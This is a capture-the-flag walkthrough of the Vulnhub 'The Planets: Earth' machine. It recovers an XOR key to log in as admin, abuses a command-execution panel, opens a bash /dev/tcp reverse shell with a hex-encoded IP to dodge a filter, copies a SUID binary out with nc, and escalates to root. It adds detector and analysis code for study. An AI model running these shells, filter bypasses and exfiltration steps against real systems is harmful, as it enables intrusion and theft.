Vulnhub series target machine: The Planets: Earth

Contents

  • Vulnhub series target machine: The Planets: Earth
    • 1. Information gathering
      • 1.1 Host scan
      • 1.2 Port scan
      • 1.3 Directory brute-forcing
    • 2. Vulnerability detection
      • 2.1 XOR decryption
      • 2.2 Decoding
    • 3. Exploiting the vulnerability
      • 3.1 Reverse shell
    • 4. Privilege escalation
      • 4.1 nc file transfer
    • Netcat (nc) file transfer

Vulnhub series target machine: The Planets: Earth

1. Information gathering

1.1 Host scan

arp-scan -l

1.2 Port scan

nmap -p- -A 192.168.188.198

The scan shows that the target machine has ports 22, 80 and 443 open.

Open the web page in a browser.

The page responds with a 400 Bad Request error, so add an entry for the target's hostname to the hosts file and visit it by name.

Visit http://earth.local/

1.3 Directory brute-forcing

dirsearch -u http://earth.local/ -e '*' -i 200

The brute-force finds /admin/login; opening it in a browser shows a login page.

Brute-force the other virtual host, https://terratest.earth.local/, as well:

dirsearch -u https://terratest.earth.local/ -i 200

2. Vulnerability detection

Open the robots.txt that the scan found.

Besides the usual disallowed paths, the last entry is Disallow: /testingnotes.*; trying it with the file extensions that appear in the entries above it gives the .txt file, /testingnotes.txt.

Translated, the page reads:

Notes on testing secure messaging systems:
* Using XOR encryption as the algorithm should be as secure as that used in RSA.
* Earth has confirmed that they received the message we sent.
* testdata.txt is used to test encryption.
* terra is used as the username for the admin portal.
To-do items:
* How do we securely send monthly keys to Earth? Or should we change keys once a week?
* Need to test different key lengths to prevent brute force. How long should a key be?
* Needs improvements to the messaging interface and admin panel interface, which is currently very basic.

At this point we know that the encryption algorithm is XOR, that the username is terra, and that a file testdata.txt was used to test the encryption.

Open /testdata.txt.

Translated, it reads:

According to radiometric dating and other evidence, the Earth was formed 4.5 billion years ago. During the first billion years of Earth's history, life emerged in the oceans and began to influence the Earth's atmosphere and surface, leading to the proliferation of anaerobic and later aerobic organisms. Some geological evidence suggests that life may have emerged as early as 4.1 billion years ago.

Back on http://earth.local/, three strings of hex data are listed under Previous Messages.

Try to recover the password for the username terra from these three ciphertexts.

2.1 XOR decryption

XOR (exclusive OR) is a logical operator that is commonly used in data encryption and checksum calculation.

XOR each of the Previous Messages with the contents of testdata.txt. The following script does the XOR decryption.

import binascii

# The three "Previous Messages" ciphertexts from http://earth.local/ (line-wrap spaces removed)
data1 = "37090b59030f11060b0a1b4e000000000000431b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"
data2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"
data3 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"

# The key stream is the plaintext of testdata.txt. XOR byte by byte from the left and stop
# at the shorter input; XOR-ing Python integers instead would align the two from the right.
key = open('testdata.txt', 'rb').read()

def xor_decrypt(hexstr, key):
    return bytes(c ^ k for c, k in zip(binascii.unhexlify(hexstr), key))

for data in (data1, data2, data3):
    print(xor_decrypt(data, key).hex())   # hex output; it is decoded to text in 2.2

testdata.txt holds the text downloaded above.

Run the script; the three results are hex strings.

2.2 Decoding

Decode each of the three hex strings with the hex-decoding tool in utools. The first two contain nothing of interest; the third decodes to the string earthclimatechangebad4humans repeated over and over.
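Why the repeated string appears: XOR-ing a ciphertext with its known plaintext leaves the key stream, and a key that is simply repeated to the message length shows up as that repetition. This is the weakness the testing notes overlook when they compare XOR with RSA. The following script is an added example, not part of the original write-up: it encrypts a constructed plaintext under a constructed repeating key, XORs the ciphertext with the plaintext just as the script in 2.1 does, and recovers the key length and the key from the period of the result. The key, the plaintext and the function names are my own.

```python
import binascii

def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, stopping at the shorter one (what the script in 2.1 does)."""
    return bytes(x ^ y for x, y in zip(a, b))

def repeating_key_xor(data: bytes, key: bytes) -> bytes:
    """Encrypt or decrypt with a key repeated to the length of the data
    (the scheme the testing notes describe). The operation is its own inverse."""
    return bytes(d ^ key[i % len(key)] for i, d in enumerate(data))

def smallest_period(stream: bytes) -> int:
    """Smallest p with stream[i] == stream[i - p] for every i >= p.
    For a key stream made by repeating a key, p is the key length."""
    for p in range(1, len(stream)):
        if all(stream[i] == stream[i - p] for i in range(p, len(stream))):
            return p
    return len(stream)

def recover_key(ciphertext_hex: str, known_plaintext: bytes) -> bytes:
    """Known-plaintext recovery: ciphertext XOR plaintext is the key stream,
    and the key is its first period. Reading the repeated
    'earthclimatechangebad4humans' out of the decoded third string is this step done by eye."""
    stream = xor_bytes(binascii.unhexlify(ciphertext_hex), known_plaintext)
    return stream[:smallest_period(stream)]

# Constructed sample: a made-up key and plaintext, not the target's values
SAMPLE_KEY = b"constructedkey42"
SAMPLE_PLAINTEXT = b"The quick brown fox jumps over the lazy dog. " * 3
SAMPLE_CIPHERTEXT_HEX = repeating_key_xor(SAMPLE_PLAINTEXT, SAMPLE_KEY).hex()

if __name__ == "__main__":
    key = recover_key(SAMPLE_CIPHERTEXT_HEX, SAMPLE_PLAINTEXT)
    print("recovered key:", key.decode())
    # Once the key is known, every other message sent under the same key falls too
    other = repeating_key_xor(b"another message sent under the same key", SAMPLE_KEY)
    print(repeating_key_xor(other, key).decode())
```

The period search is what makes the key length question in the to-do list moot: with a known plaintext, any key length is recovered in one pass, and the same key reused across messages (the monthly keys the notes mention) decrypts all of them.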

Log in at /admin/login with this username and password:

terra
earthclimatechangebad4humans

The login succeeds.

The admin page has a CLI feature that runs commands on the server: a command execution vulnerability.

Search for a flag file; there is one at /var/earth_web/user_flag.txt.

Read /var/earth_web/user_flag.txt.

This gives the first flag.

3. Exploiting the vulnerability

3.1 Reverse shell

Now that we can execute commands, we can try a reverse shell back to the Kali host (192.168.188.157):

bash -i &> /dev/tcp/192.168.188.157/8888 0>&1

The attempt fails: the response says that remote connections are prohibited.

To get around this you can hex-encode the IP address or base64-encode the entire command. Here I hex-encode the IP address.

Convert the IP address to hexadecimal (192.168.188.157 is 0xC0A8BC9D).

bash -i >& /dev/tcp/0XC0A8BC9D/8888 0>&1

Then listen on port 8888 on the Kali host:

nc -lnvp 8888

The shell connects back.

Check the current user's privileges.

They are low, so try to escalate.
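The hex-encoded address gets past a check that only looks for the address as it was first written. As an added example that is not part of the original write-up, the following Python code canonicalises the numeric host spellings that inet_aton-style resolvers accept (dotted quad, and a single 32-bit value in hex or decimal, among others) before comparing them, which is how a defender's check or a detection rule should treat /dev/tcp redirections. The command lines, the function names and the allow list are constructed for the demonstration.

```python
import re
from typing import List, Optional, Tuple

def canonical_ipv4(literal: str) -> Optional[str]:
    """Normalise an IPv4 literal to dotted-quad form.

    Accepts a dotted quad (192.168.188.157), or one 32-bit value written in
    hex (0XC0A8BC9D) or in decimal (3232283805). Returns None for anything else."""
    s = literal.strip()
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", s):
        octets = [int(p) for p in s.split(".")]
        return s if all(o <= 255 for o in octets) else None
    try:
        value = int(s, 16) if s.lower().startswith("0x") else int(s, 10)
    except ValueError:
        return None
    if not 0 <= value <= 0xFFFFFFFF:
        return None
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))

# /dev/tcp/<host>/<port> redirections, whatever form <host> is written in
DEVTCP = re.compile(r"/dev/tcp/([^/\s]+)/(\d+)")

def devtcp_targets(command: str) -> List[Tuple[str, int]]:
    """(host, port) for every /dev/tcp redirection in a command line, with numeric
    hosts rewritten to dotted quads; non-numeric hosts are returned unchanged."""
    return [(canonical_ipv4(host) or host, int(port))
            for host, port in DEVTCP.findall(command)]

def violates_policy(command: str, allowed_hosts: List[str]) -> bool:
    """True if the command opens a /dev/tcp connection to a host outside the allow list.
    Comparing canonical forms is what makes the hex and decimal spellings irrelevant."""
    return any(host not in allowed_hosts for host, _ in devtcp_targets(command))

# Constructed command lines for the check; the hex spelling is the one used above
SAMPLE_COMMANDS = [
    "bash -i >& /dev/tcp/192.168.188.157/8888 0>&1",
    "bash -i >& /dev/tcp/0XC0A8BC9D/8888 0>&1",
    "bash -i >& /dev/tcp/3232283805/8888 0>&1",
    "ls -la /var/earth_web",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(devtcp_targets(cmd), violates_policy(cmd, allowed_hosts=[]), "<-", cmd)
```

Canonicalising the host only closes one spelling; the base64 variant mentioned above hides the whole command, so an inspection step would also have to decode that. The real fix for the admin CLI is not a better filter but not passing user input to a shell at all.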

4. Privilege escalation

Look for files with special permissions (the SUID bit):

find / -perm -u=s -type f 2>/dev/null

Command analysis:

  • -perm -u=s: match files by their permission bits. -perm selects a permission test, u refers to the owner's permission bits, and s is the SetUID bit. SetUID (Set User ID) is a special permission: when any user executes the file, it runs with the privileges of the file's owner.
  • -type f: match regular files only; f stands for file.
  • 2>/dev/null: redirect error output (stderr) to /dev/null, i.e. discard error messages such as permission-denied errors.

The file reset_root stands out; try running it.

It does not run successfully.

4.1 nc file transfer

Use nc to copy the file to Kali for analysis.

On Kali, start a listener that writes whatever arrives to a file:

nc -nlvp 7788 > reset_root

Then, in the target's shell, send the file:

nc 192.168.188.157 7788 < /usr/bin/reset_root

Command analysis:

  • Netcat (nc) connects to port 7788 on the receiving host 192.168.188.157 and sends it the contents of /usr/bin/reset_root.

strace debugging tool

Use strace to watch what reset_root does while it runs. Install it if it is not present:

sudo apt install strace

Make reset_root executable and run it under strace:

chmod +x reset_root
strace ./reset_root

Command analysis:

  • strace is a tool that traces the system calls a process makes and the signals it receives
    • strace: starts the strace tool.
    • ./reset_root: the executable file or command to trace.

The trace shows that execution fails because three files or directories it checks for do not exist.
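Reading the missing paths out of a long strace listing by eye is error-prone, so here is an added example, not part of the original write-up, that does it programmatically: it scans strace output for syscalls that returned ENOENT, keeps the paths, and drops the dynamic loader's routine probes. The trace text is constructed in the shape of the output shown above; the three trigger paths are the ones reported in this write-up, and the other lines, the addresses, the message text and the regular expression are my own.

```python
import re
from typing import List

# Constructed strace excerpt. The three trigger paths are the ones from the write-up;
# the addresses, loader lines and message text are made up for illustration.
SAMPLE_TRACE = """\
execve("./reset_root", ["./reset_root"], 0x7ffd0000 /* 20 vars */) = 0
brk(NULL)                               = 0x55550000
openat(AT_FDCWD, "/etc/ld.so.preload", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
access("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (No such file or directory)
write(1, "reset failed", 12)            = 12
exit_group(1)                           = ?
"""

# A syscall line whose first quoted argument is a path and whose result is ENOENT
ENOENT_CALL = re.compile(r'^(?P<call>\w+)\(.*?"(?P<path>[^"]+)".*= -1 ENOENT\b')

# Paths the dynamic loader probes on every run; their absence is normal
LOADER_NOISE = ("/etc/ld.so.", "/lib", "/usr/lib", "/lib64", "/usr/lib64")

def missing_paths(trace: str) -> List[str]:
    """Every path a traced syscall failed to find, in order, without duplicates."""
    found: List[str] = []
    for line in trace.splitlines():
        m = ENOENT_CALL.match(line)
        if m and m.group("path") not in found:
            found.append(m.group("path"))
    return found

def trigger_candidates(trace: str) -> List[str]:
    """Missing paths that are not loader noise: the files the program itself looks for."""
    return [p for p in missing_paths(trace) if not p.startswith(LOADER_NOISE)]

if __name__ == "__main__":
    for path in trigger_candidates(SAMPLE_TRACE):
        print("missing:", path)
```

With a real binary, strace -e trace=file ./reset_root limits the output to file-related calls, and strace -o trace.txt ./reset_root writes it to a file that a script like this can read. A SUID binary whose behaviour depends on world-writable paths under /tmp and /dev/shm is exactly the kind of finding a setuid audit should flag.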

Create these three files in the target's shell:

touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe

After creating them, run reset_root again.

This produces the root password: Earth

Switching to root with it succeeds, and the final flag is obtained.

Netcat (nc) file transfer

File transfer using Netcat (nc) allows you to quickly transfer files between computers. Netcat is a network tool that can create network connections, send and receive data.

Detailed steps:

  1. Start listening on the receiving end

    nc -l -p <port> > received_file

    Run this on the receiving end to listen on the chosen port. -l selects listening mode and -p sets the port number. Everything that arrives on the connection is redirected into received_file.

  2. Send the file from the sending side

    nc <receiver_ip> <receiver_port> < file_to_send

    Run this on the sending side. <receiver_ip> is the IP address of the receiving end, <receiver_port> is the port it is listening on, and < file_to_send redirects the file (name or path) into nc's standard input. Netcat sends the contents of the file to the receiving end over the network.

  3. The receiving end receives the file

    The receiving end writes the data to the file named by received_file. You can find it in the receiver's file system and process it further.

Before using it, make sure that:

  • There is a network connection between the sender and receiver, and the network settings are correct.
  • The receiving port is not blocked by a firewall or other network security device.
  • Both the sender and receiver have sufficient permissions to read and write the file.
  • Make sure the file path and file name are correct.
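To show what the two nc commands do at the socket level, and to add the integrity check that nc itself does not provide, the following Python program is an added example, not part of the original text: it runs the receiver and the sender over loopback, reads until EOF exactly as nc -l -p <port> > received_file does, and compares SHA-256 digests of what was sent and what arrived. The payload is a constructed stand-in for the transferred file and the function names are my own.

```python
import hashlib
import socket
import threading
from typing import Tuple

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def receive_file(listener: socket.socket) -> bytes:
    """Receiver side, the equivalent of nc -l -p PORT > received_file:
    accept one connection and read until the sender closes it."""
    conn, _peer = listener.accept()
    chunks = []
    with conn:
        while True:
            chunk = conn.recv(65536)
            if not chunk:          # EOF: the sender has shut down its write side
                break
            chunks.append(chunk)
    return b"".join(chunks)

def send_file(host: str, port: int, payload: bytes) -> None:
    """Sender side, the equivalent of nc HOST PORT < file_to_send:
    connect, write everything, then signal EOF so the receiver stops reading."""
    with socket.create_connection((host, port)) as conn:
        conn.sendall(payload)
        conn.shutdown(socket.SHUT_WR)

def transfer(payload: bytes) -> Tuple[bytes, bool]:
    """Run both sides over loopback on an ephemeral port and return
    (received_bytes, digest_matches). nc gives no integrity check of its own,
    so the digest comparison is the step to add after any nc transfer."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    box = {}
    receiver = threading.Thread(target=lambda: box.setdefault("data", receive_file(listener)))
    receiver.start()
    send_file("127.0.0.1", port, payload)
    receiver.join()
    listener.close()
    received = box.get("data", b"")
    return received, sha256_hex(received) == sha256_hex(payload)

# Constructed stand-in for the binary being copied: 1 MiB containing every byte value
SAMPLE_FILE = bytes(range(256)) * 4096

if __name__ == "__main__":
    received, ok = transfer(SAMPLE_FILE)
    print(len(received), "bytes received, digest match:", ok)
```

Two practical notes. The -l -p <port> spelling is the traditional and GNU netcat syntax, also accepted by Nmap's ncat; OpenBSD netcat takes the port as an argument instead (nc -l <port>). And because nc carries no checksum, run sha256sum on both ends after the transfer, which is what the digest comparison above stands in for.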